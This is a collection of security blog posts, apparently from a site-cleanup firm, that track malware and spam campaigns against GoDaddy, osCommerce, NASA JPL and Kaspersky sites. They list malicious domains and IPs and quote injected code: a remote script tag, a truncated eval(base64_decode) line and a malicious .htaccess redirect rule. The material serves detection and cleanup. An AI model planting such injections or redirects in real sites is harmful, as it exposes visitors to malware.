Attacks on GoDaddy sites – insomniaboldinfoorg.com

UPDATE: As of 4AM Pacific, on November 3rd, we’ve received various reports of another related outbreak of exploited sites on GoDaddy. We’re currently researching the issue and will provide updated scripts if necessary. Please comment below if you have been affected, or if you have any information on the exploit.


Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites using insomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll.php?k=1

www3.hope-soft57.net
www3.new-protectionsoft23.in
www4.free-pc-protection9.in

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

www3.large-defense1.in


Read More

Hilary Kneber at it again: voip.dialistico.net

The Hilary Kneber group is at it again. We are now tracking their usage of voip.dialistico.net to push malware to quite a few sites. If you don’t know about them, just take a look at our blog history. Most of the mass attacks we posted were controlled and created by them.

All the infected sites have this malware:

<script src="http://voip.dialistico.net/products/voip.php”..

Which is generated by a large string of encoded PHP added to all files in a site. If your site got hacked, we have a clean up solution here: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html. Some details here too: MW:GDD:3.

The above code loads malware from www4.pc-guard-soft6.net, which is hosted at 69.57.173.221 (from unique-protection.com – famous fake AV site).

And the whois for dialistico.net:

Domain name: dialistico.net
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

This IP is hosted 77.78.239.53, which was also the home of recent attacks:

myblindstudioinfoonline.com
meqashoppercom.com
insomniaboldinfocom.com
voip.dialistico.net

We will post more details when we get them.


Is your site hacked? Visit http://sucuri.net and we will clean up the mess for you.

Malware update: ssl-verification.net

Quick malware update: The site ssl-verification.net (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and by the analyzing logs, we could find the C&C IP address: 41.190.16.17.

41.190.16.17 – - [20/Oct/2010:03:35:21 -0700] “GET /img/readthat.php HTTP/1.1″ 200 11204 “http://phlks.com/doors/check_all.pl?5″ “Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10″

What is interesting is that it seems the attackers are using http://phlks.com/doors/check_all.pl to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at 85.17.213.243, so suggestion for hosting companies: Block this IP.


Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.

More attacks – Hilary Kneber and insomniaboldinfocom.com

For the last couple of days, we’ve been seeing a good number of sites hacked with a familiar pattern. All of them have a javascript loading malware (the famous fake AV) from:

http://insomniaboldinfocom.com/mm.php

http://insomniaboldinfonet.com/mm.php

http://www3.large-defense1.in

This is very similar to the GoDaddy attack of a few weeks ago, but this time it’s affecting other hosting providers.

All the sites we’ve seen so far have the following code added to all PHP files:

eval(base64_decode("aWYoZnVuY3Rpb....

What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related (even though this domain wasn’t registered in their name)

Read More

NASA web site hacked and serving malware/spam

Some sites under NASA’s Jet Propulsion lab ( http://jpl.nasa.gov/ ) have been hacked and are being used on the infamous blackhat SEO Spam network. Not only that, but they are also serving malware to unsuspicious users.

The sites in question are http://ki.jpl.nasa.gov/, http://aviris.jpl.nasa.gov/ and a few others. Most of these malicious pages are well hidden in the site, for example at http://aviris.jpl.nasa.gov/cgi/ch/.cache/levitra-drug-impotence:

NASA with spam

You can also search on google for “cialis canada inurl:nasa.org” to find a few more pages and sites infected:

Read More

Kaspersky site hacked and redirecting users to fake AV

If you tried to download and/or visit Kaspersky’s web site yesterday, please check if your computer didn’t get infected. Their web site was hacked and their download pages were redirecting users to a fake AV (malware) page.

The malware was getting loaded from http://77.78.246.143, which is already blacklisted by Google:

Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, 77.78.246.0 appeared to function as an intermediary for the infection of 46 site(s) including mygidoctors.com/, bruyereu.eu/, bitterpiecomix.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1941 domain(s), including franchesco.kwik.to/, soloingenieria.net/, marchex.com/.

Users are complaining about it in their forums, but Kaspersky has not released an official statement about it:

http://forum.kaspersky.com/index.php?showtopic=189198
http://www.calendarofupdates.com/updates/index.php?showtopic=32851

Update: Kaspersky confirmed the incident to itpro.co.uk: http://www.itpro.co.uk/627817/updated-kaspersky-hit-by-cyber-criminals

It shows that even security companies are not immune from this types of attacks. Hopefully they will post an update soon.

Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn’t want to get a prescription. So I went to Google and searched for it. Interesting enough, Rail Europe ( http://blog.raileurope.com ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

Pharma hack

Read More

osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

OsCommerce hacked

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us a support@sucuri.net or http://sucuri.net

More attacks – Hilary Kneber and meqashoppecom – Part II

A few days ago we reported a large scale attack affecting WordPress sites at hosted on 123-reg servers. They were using the domains meqashopperinfo.com and meqashopperonline.ccom to spread the malware. You can read more about it here.

Today, we’re seeing a small variation of this attack. We’re continuing our research, but it seems the attack has spread to another host, and maybe more. The attackers are using meqashoppercom.com to spread the malware and the following javascript gets added to the affected sites (result from our scanner):


Read More

EA.com – Please protect your forum or shut it down

A note to EA.com: Please protect your forums or shut it down.

Not only are more than half of the posts (http://forum.ea.com) serving SPAM, they are also being used to affect other web sites. More often than not, when a site gets hacked with SEO Spam, we see links like this one (pointing to EA.com):

purchasing   viagra  overnight &nbsp – Tramadol and pregnancy (http://forum.ea.com/eaforum/posts/list/2080837.page)

The main page of the forum is all serving spam (see the recent posts) tab:

Read More